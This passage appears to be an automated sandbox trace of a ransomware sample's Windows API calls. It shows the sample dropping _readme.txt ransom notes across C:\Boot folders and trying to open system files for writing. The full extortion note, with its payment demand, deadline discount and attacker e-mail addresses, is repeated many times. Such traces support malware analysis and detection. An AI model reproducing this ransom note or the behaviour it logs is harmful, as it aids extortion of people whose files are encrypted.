wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.852] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0228.852] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.852] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.852] PathFindFileNameW (pszPath="") returned="" [0228.852] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.852] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.852] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.852] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.853] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0228.853] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0228.853] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.853] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.853] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.853] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.853] PathFindExtensionW (pszPath="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned=".mui" [0228.853] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.855] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.855] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.855] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.855] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0228.855] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.855] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.855] PathFindFileNameW (pszPath="") returned="" [0228.855] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.856] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.856] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.856] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.856] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0228.856] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0228.856] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.856] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.856] CreateFileW (lpFileName="C:\\Boot\\de-DE\\_readme.txt" (normalized: "c:\\boot\\de-de\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.856] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.856] PathFindExtensionW (pszPath="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned=".mui" [0228.856] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.857] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.857] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.857] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.857] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0228.857] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.857] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.857] PathFindFileNameW (pszPath="") returned="" [0228.857] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.857] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.857] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.857] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.857] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0228.858] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0228.858] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.858] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.858] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.858] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.858] PathFindExtensionW (pszPath="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned=".mui" [0228.858] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.858] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.858] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.858] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.858] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0228.859] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.859] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.859] PathFindFileNameW (pszPath="") returned="" [0228.859] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.859] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.859] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.859] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.859] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0228.859] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0228.859] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your 